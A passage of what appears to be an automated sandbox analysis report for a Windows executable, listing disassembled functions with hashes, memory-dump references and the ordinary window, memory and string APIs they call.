                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                            • Instruction ID: 16f052d1963eaeb443c57f328ba6038ca6336b51f78348676de2edec5e85d380
                                                                                            • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                            • Instruction Fuzzy Hash: 6E523A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                            Function 00A47153 Relevance: .5, Instructions: 536COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f065cc03163b096130e74f3cb44f67c3d1994ffcc709d50835b122868d84f16e
                                                                                            • Instruction ID: 7868cffee06edb7ff517a5977f8599682e33af26f7f0d85abb7e72df3767e237
                                                                                            • Opcode Fuzzy Hash: f065cc03163b096130e74f3cb44f67c3d1994ffcc709d50835b122868d84f16e
                                                                                            • Instruction Fuzzy Hash: FA12C2B56087468FC728CF28C590ABDB7E1FF94304F10892EE996CB781E374A995CB45
                                                                                            Function 00A3C426 Relevance: .5, Instructions: 454COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9f24767591d4166fdd23e8e493ff13d911842074e91e8ce94689378ec040f900
                                                                                            • Instruction ID: 6a2c0f2f2f836891e929933e6ba005816481c76db8f946c53f3f6f0691cdd99b
                                                                                            • Opcode Fuzzy Hash: 9f24767591d4166fdd23e8e493ff13d911842074e91e8ce94689378ec040f900
                                                                                            • Instruction Fuzzy Hash: F6F18A71A083118FC758CF29C98462ABBE5FFCA324F155A2EF4C5A7256D730E945CB42
                                                                                            Function 00A46CDC Relevance: .3, Instructions: 343COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            • Opcode ID: d356faf1860c80574d9fbd3fcb2014acec3f303c8c4fb93371b1d31b4e5211c5
                                                                                            • Instruction ID: 1d3908959f826ca6debc41b1fbc68a0294a8288b57f6a14f4b4c7ff792af3b52
                                                                                            • Opcode Fuzzy Hash: d356faf1860c80574d9fbd3fcb2014acec3f303c8c4fb93371b1d31b4e5211c5
                                                                                            • Instruction Fuzzy Hash: 76D1B4B9A083818FDB14CF28C94575BBBE1BFC9318F08456DE8899B242D774E909CB56
                                                                                            Function 00A3E9B7 Relevance: .3, Instructions: 320COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ca3d026224c9abf1ea08edbdf8eb4b950b6f8890c0647b0bce8227091ac29b40
                                                                                            • Instruction ID: 5b55b7ae570db125106ef951045bfa358a4e31761f9ac2eb2a823cd38f2b8b89
                                                                                            • Opcode Fuzzy Hash: ca3d026224c9abf1ea08edbdf8eb4b950b6f8890c0647b0bce8227091ac29b40
                                                                                            • Instruction Fuzzy Hash: 85E16D765087908FC304CF69D88096ABFF0BF9A300F45495EF9D897352C235EA5ADB92
                                                                                            Function 00A44088 Relevance: .3, Instructions: 270COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                            • Instruction ID: bc89f9e80a4af0817ddfd980e9cfad1e4d0e28fd87337d951b868ab7a753846e
                                                                                            • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                            • Instruction Fuzzy Hash: 359156B52003498BDB24EF68D991BFA77D5EBE8300F10092DFA968B282DA74A545C752
                                                                                            Function 00A443BF Relevance: .2, Instructions: 243COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                            • Instruction ID: 418e818e3ea00f8a03aa2915ff6b71154c2355b9dea16ede775df94a97e00512
                                                                                            • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                            • Instruction Fuzzy Hash: 708148B53043464FEF24DF68C9D1BBD77D4ABE9304F00492DFAC68B282DA7089858752
                                                                                            Function 00A551C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b823834d6e2be7bbaf1b2ea1e592ad3bde0340a40105d49cba50ebce6aa17481
                                                                                            • Instruction ID: 0c215554f75cf759d929f5b364b37d264910bcbc96739c5f10d932086c435841
                                                                                            • Opcode Fuzzy Hash: b823834d6e2be7bbaf1b2ea1e592ad3bde0340a40105d49cba50ebce6aa17481
                                                                                            • Instruction Fuzzy Hash: BC614471E40F0866DA389B78A9B57FE23A4BB11353F140519FC46DF281E2B1DD8E8711
                                                                                            Function 00A54F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                            • Instruction ID: 45463ca3fa789228fdd0e5a91ba8fbd7600494d89cffa4f1be666addf48cba46
                                                                                            • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                            • Instruction Fuzzy Hash: 0D512471E00E446BDB38677C8576BBE27E5BB16707F180919EC82CB282D535AD8D8391
                                                                                            Function 00A3EFE2 Relevance: .2, Instructions: 161COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a2c6e61b73736639336ecfe40fc84f42f35d3dcf8fd824b9266fa639b25b4276
                                                                                            • Instruction ID: fcd653e2ec6f0f337c52ce1d225d25ce48d26a75c058632c59693d62016d8893
                                                                                            • Opcode Fuzzy Hash: a2c6e61b73736639336ecfe40fc84f42f35d3dcf8fd824b9266fa639b25b4276
                                                                                            • Instruction Fuzzy Hash: 3F51E2359093D58FD702CF38D14046EBFF0AE9A314F4A09AEF4D95B243D220DA4ACB62
                                                                                            Function 00A400B7 Relevance: .1, Instructions: 141COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 91d328bec97c179e92cd58e2a7bcf2e586c0402b9977f29458d47959ffa6388c
                                                                                            • Instruction ID: dfa6d4c1014695a2c332d4fb8769275631e7fbcec0ae4769483f948130330622
                                                                                            • Opcode Fuzzy Hash: 91d328bec97c179e92cd58e2a7bcf2e586c0402b9977f29458d47959ffa6388c
                                                                                            • Instruction Fuzzy Hash: 7851DEB1A087119FC748CF19D48055AF7E1FF88314F058A2EE899E3340D734EA59CB9A
                                                                                            Function 00A43E0B Relevance: .1, Instructions: 112COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                            • Instruction ID: 7c6b952de22e9b0c5d6d490ab17390c0312fa7258949b4733fb22833352ad810
                                                                                            • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                            • Instruction Fuzzy Hash: 0231F6B6A147568FCB18DF28C85126EBBE0FBA5314F10492DE4D9C7342C735EA0ACB91
                                                                                            Function 00A3E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _swprintf.LIBCMT ref: 00A3E30E
                                                                                              • Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5
                                                                                              • Part of subcall function 00A41DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00A71030,00000200,00A3D928,00000000,?,00000050,00A71030), ref: 00A41DC4
                                                                                            • _strlen.LIBCMT ref: 00A3E32F
                                                                                            • SetDlgItemTextW.USER32(?,00A6E274,?), ref: 00A3E38F
                                                                                            • GetWindowRect.USER32(?,?), ref: 00A3E3C9
                                                                                            • GetClientRect.USER32(?,?), ref: 00A3E3D5
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00A3E475
                                                                                            • GetWindowRect.USER32(?,?), ref: 00A3E4A2
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00A3E4DB
                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00A3E4E3
                                                                                            • GetWindow.USER32(?,00000005), ref: 00A3E4EE
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00A3E51B
                                                                                            • GetWindow.USER32(00000000,00000002), ref: 00A3E58D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                            • String ID: $%s:$CAPTION$d
                                                                                            • API String ID: 2407758923-2512411981
                                                                                            • Opcode ID: 137068987809aa9affd7c6764ea87c9d367b8a938f933885186079495a5cc13f
                                                                                            • Instruction ID: a5651c255e3929e747a51754e36137cff61afbf732cc2795a6ed763671fdd7d5
                                                                                            • Opcode Fuzzy Hash: 137068987809aa9affd7c6764ea87c9d367b8a938f933885186079495a5cc13f
                                                                                            • Instruction Fuzzy Hash: 4B818172608301AFDB10DFA8CD89A6FBBF9FBC9704F04091DFA8497290D671E9058B52
                                                                                            Function 00A5CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___free_lconv_mon.LIBCMT ref: 00A5CB66
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C71E
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C730
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C742
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C754
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C766
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C778
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C78A
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C79C
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C7AE
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C7C0
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C7D2
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C7E4
                                                                                              • Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C7F6
                                                                                            • _free.LIBCMT ref: 00A5CB5B
                                                                                              • Part of subcall function 00A58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?), ref: 00A58DE2
                                                                                              • Part of subcall function 00A58DCC: GetLastError.KERNEL32(?,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?,?), ref: 00A58DF4
                                                                                            • _free.LIBCMT ref: 00A5CB7D
                                                                                            • _free.LIBCMT ref: 00A5CB92
                                                                                            • _free.LIBCMT ref: 00A5CB9D
                                                                                            • _free.LIBCMT ref: 00A5CBBF
                                                                                            • _free.LIBCMT ref: 00A5CBD2
                                                                                            • _free.LIBCMT ref: 00A5CBE0
                                                                                            • _free.LIBCMT ref: 00A5CBEB
                                                                                            • _free.LIBCMT ref: 00A5CC23
                                                                                            • _free.LIBCMT ref: 00A5CC2A
                                                                                            • _free.LIBCMT ref: 00A5CC47
                                                                                            • _free.LIBCMT ref: 00A5CC5F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                            • String ID:
                                                                                            • API String ID: 161543041-0
                                                                                            • Opcode ID: 3cf5ccda5d75f8e686a642673f10b6a1324ecfb29a856519d3a29455c11caade
                                                                                            • Instruction ID: d7fdb312e231c5442b170847c1f1d5219db112e165f33d76836505d7fe72235e
                                                                                            • Opcode Fuzzy Hash: 3cf5ccda5d75f8e686a642673f10b6a1324ecfb29a856519d3a29455c11caade
                                                                                            • Instruction Fuzzy Hash: 9B313E326003099FEB21AB38D946B5A77F9FF10722F155419E958E7196DF39EC88CB10
                                                                                            Function 00A49711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 00A49736
                                                                                            • _wcslen.LIBCMT ref: 00A497D6
                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00A497E5
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00A49806
                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00A4982D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                            • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                            • API String ID: 1777411235-4209811716
                                                                                            • Opcode ID: 9f9a7bd79882fd75c3b8225a94ba31284df75a46203c1b9707c5cfe3b4d32e56
                                                                                            • Instruction ID: 0ae3ec852b6ee2ae0020a28fba334d9a6a731bc7a37926fa4da0ce0f8105bf92
                                                                                            • Opcode Fuzzy Hash: 9f9a7bd79882fd75c3b8225a94ba31284df75a46203c1b9707c5cfe3b4d32e56
                                                                                            • Instruction Fuzzy Hash: 1C3128365083017AEB25AF749C06F6F77E8AFC2321F14051EF901961D2EB749A1983A6
                                                                                            Function 00A4D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetWindow.USER32(?,00000005), ref: 00A4D6C1
                                                                                            • GetClassNameW.USER32(00000000,?,00000800), ref: 00A4D6ED
                                                                                              • Part of subcall function 00A41FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00A3C116,00000000,.exe,?,?,00000800,?,?,?,00A48E3C), ref: 00A41FD1
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00A4D709
                                                                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00A4D720
                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00A4D734
                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00A4D75D
                                                                                            • DeleteObject.GDI32(00000000), ref: 00A4D764
                                                                                            • GetWindow.USER32(00000000,00000002), ref: 00A4D76D
                                                                                            Strings
                                                                                            Memory Dump Source
